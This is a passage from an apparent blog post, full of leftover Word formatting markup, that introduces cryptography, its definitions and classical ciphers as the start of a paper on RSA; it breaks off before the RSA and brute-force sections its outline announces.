UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]-->
<!--StartFragment-->
<br />
<h1>
<span style="font-family: Times, Times New Roman, serif; font-size: large;"><a href="https://www.blogger.com/blogger.g?blogID=7947080244954191821" name="_Toc255256447"></a>Introduction</span></h1>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;">
The purpose of this
paper is to emphasize in the importance of cryptography, focus in RSA
asymmetric cryptographic algorithm and explain:</span><br />
<span style="font-family: Times, Times New Roman, serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<ul style="margin-top: 0cm;" type="disc">
<li class="MsoNormal"><span style="font-family: Times, Times New Roman, serif;">What is cryptography</span></li>
</ul>
<ul style="margin-top: 0cm;" type="disc">
<li class="MsoNormal"><span style="font-family: Times, Times New Roman, serif;">Why cryptography is important</span></li>
</ul>
<ul style="margin-top: 0cm;" type="disc">
<li class="MsoNormal"><span style="font-family: Times, Times New Roman, serif;">History of Cryptography</span></li>
</ul>
<ul style="margin-top: 0cm;" type="disc">
<li class="MsoNormal"><span style="font-family: Times, Times New Roman, serif;">Mathematical RSA operations</span></li>
</ul>
<ul style="margin-top: 0cm;" type="disc">
<li class="MsoNormal"><span style="font-family: Times, Times New Roman, serif;">How to perform an RSA brute-force</span></li>
</ul>
<div>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>200</o:Words>
<o:Characters>1146</o:Characters>
<o:Company>Lamehacker</o:Company>
<o:Lines>9</o:Lines>
<o:Paragraphs>2</o:Paragraphs>
<o:CharactersWithSpaces>1344</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="0" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";}
</style>
<![endif]-->
<!--StartFragment-->
<br />
<b><span style="font-size: large;">What is Cryptography</span></b><br />
<br />
<span style="font-family: Times, 'Times New Roman', serif;">Cryptography
(or cryptology; from Greek κρυπτός, kryptos, "hidden, secret"; and
γράφω, gráphō, "I write", or -λογία, -logia, respectively) is the
practice and study of hiding information. Modern cryptography intersects the
disciplines of mathematics, computer science, and engineering. Applications of
cryptography include ATM cards, computer passwords, and electronic commerce. [2]</span><br />
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">Until recently
cryptography referred mostly to encryption, which is the process of converting
ordinary information (plaintext) into unintelligible gibberish (i.e. cipher-text).
[4] </span><span style="font-family: Times, 'Times New Roman', serif;">Decryption
is the reverse, in other words, moving from unreadable cipher-text back to
plaintext. A cipher is a pair of algorithms that create the encryption and the
reversing, also called decryption. [4] </span><span style="font-family: Times, 'Times New Roman', serif;">The
operation of an algorithmic cipher is controlled by both the algorithm and in
each instance by a key. The key is a secret parameter (ideally known only to
the communicants) for a specific message exchange context. [4]</span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;">In order
for two parties to exchange a cryptographic message both must have one or two
secret keys (it depends if the parties use an asymmetric or a symmetric
algorithm) and a known mathematical cryptographic algorithm (both parties must
know the details of the cryptographic algorithm) the following diagram shows
the process. </span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDyaxY6md7D5mOLGaA6Q-26IfAUWFnqdvupGl3S5tMfC8tt8eqwJNx8tJrMcROQrnp2hyphenhyphen67HduNnTVQ7cdxQaUYcstGxsoY-Q_syaKNEOftOllIwEyeg-GxRgHtF-6qULqyup0AUr4hwk/s1600/c1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Times, Times New Roman, serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDyaxY6md7D5mOLGaA6Q-26IfAUWFnqdvupGl3S5tMfC8tt8eqwJNx8tJrMcROQrnp2hyphenhyphen67HduNnTVQ7cdxQaUYcstGxsoY-Q_syaKNEOftOllIwEyeg-GxRgHtF-6qULqyup0AUr4hwk/s1600/c1.png" /></span></a></div>
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><b>Picture2</b>: Simple
encryption decryption operation (if the cryptography used is symmetric then
key1=key2) [3]</span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Times, Times New Roman, serif;"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-GB" style="font-family: Times, Times New Roman, serif;"><b>Note</b>: Secret keys
are very important, as ciphers without variable size keys can be trivially
broken with only the knowledge of the cipher used and are therefore not useful
at all in most cases.<o:p></o:p></span></div>
<br />
<span style="font-family: Times, Times New Roman, serif; font-size: large;"><b>History of Cryptography</b></span><br />
<span style="font-family: Times, 'Times New Roman', serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Times, 'Times New Roman', serif;">Before the modern era, cryptography was concerned solely with message confidentiality (i.e., encryption) — conversion of messages from a comprehensible form into an incomprehensible one and back again at the other end, rendering it unreadable by interceptors or eavesdroppers without secret knowledge (namely the key needed for decryption of that message). Encryption was used to (attempt to) ensure secrecy in communications, such as those of spies, military leaders, and diplomats. [6]</span><br />
<span style="font-family: Times, Times New Roman, serif;"><br /></span><span style="font-family: Times, 'Times New Roman', serif;">The earliest forms of secret writing required little more than local pen and paper analogy, as most people could not read. More literacy, or literate opponents, required actual cryptography. The main classical cipher types are transposition ciphers, which rearrange the order of letters in a message (e.g., 'hello world' becomes 'ehlol owrdl' in a trivially simple rearrangement scheme), and substitution ciphers, which systematically replace letters or groups of letters with other letters or groups of letters (e.g., 'fly at once' becomes 'gmz bu podf' by replacing each letter with the one following it in the Latin alphabet). [6]</span><br />
<br />
<span style="font-size: large;"><b>Asymmetric and Symmetric Cryptography </b></span><br />
<br />
